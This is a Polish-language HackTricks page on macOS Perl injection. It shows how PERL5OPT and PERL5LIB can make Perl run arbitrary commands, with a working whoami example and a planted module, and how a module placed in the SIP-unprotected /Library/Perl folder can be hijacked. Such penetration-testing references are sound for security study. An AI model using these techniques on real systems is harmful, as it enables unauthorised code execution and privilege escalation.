hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md

4.5 KiB

Wstrzykiwanie aplikacji Perl w macOS

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Przez zmienną środowiskową PERL5OPT & PERL5LIB

Korzystając z zmiennej środowiskowej PERL5OPT, można sprawić, że perl będzie wykonywał dowolne polecenia.
Na przykład, utwórz ten skrypt:

{% code title="test.pl" %}

#!/usr/bin/perl
print "Hello from the Perl script!\n";

{% endcode %}

Teraz wyeksportuj zmienną środowiskową i wykonaj skrypt perl:

export PERL5OPT='-Mwarnings;system("whoami")'
perl test.pl # This will execute "whoami"

Inną opcją jest utworzenie modułu Perl (np. /tmp/pmod.pm):

{% code title="/tmp/pmod.pm" %}

#!/usr/bin/perl
package pmod;
system('whoami');
1; # Modules must return a true value

{% endcode %}

A następnie użyj zmiennych środowiskowych:

PERL5LIB=/tmp/ PERL5OPT=-Mpmod

Poprzez zależności

Możliwe jest wyświetlenie kolejności folderów zależności Perl:

perl -e 'print join("\n", @INC)'

Który zwróci coś w stylu:

/Library/Perl/5.30/darwin-thread-multi-2level
/Library/Perl/5.30
/Network/Library/Perl/5.30/darwin-thread-multi-2level
/Network/Library/Perl/5.30
/Library/Perl/Updates/5.30.3
/System/Library/Perl/5.30/darwin-thread-multi-2level
/System/Library/Perl/5.30
/System/Library/Perl/Extras/5.30/darwin-thread-multi-2level
/System/Library/Perl/Extras/5.30

Niektóre z zwróconych folderów nawet nie istnieją, jednak /Library/Perl/5.30 istnieje, nie jest chroniony przez SIP i znajduje się przed folderami chronionymi przez SIP. Dlatego ktoś mógłby nadużyć tego folderu, aby dodać zależności skryptu, tak aby skrypt Perl o wysokich uprawnieniach mógł je załadować.

{% hint style="warning" %} Jednak zauważ, że musisz być rootem, aby móc pisać w tym folderze, a obecnie otrzymasz ten komunikat TCC: {% endhint %}

Na przykład, jeśli skrypt importuje use File::Basename;, byłoby możliwe utworzenie /Library/Perl/5.30/File/Basename.pm, aby wykonać arbitralny kod.

References

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks: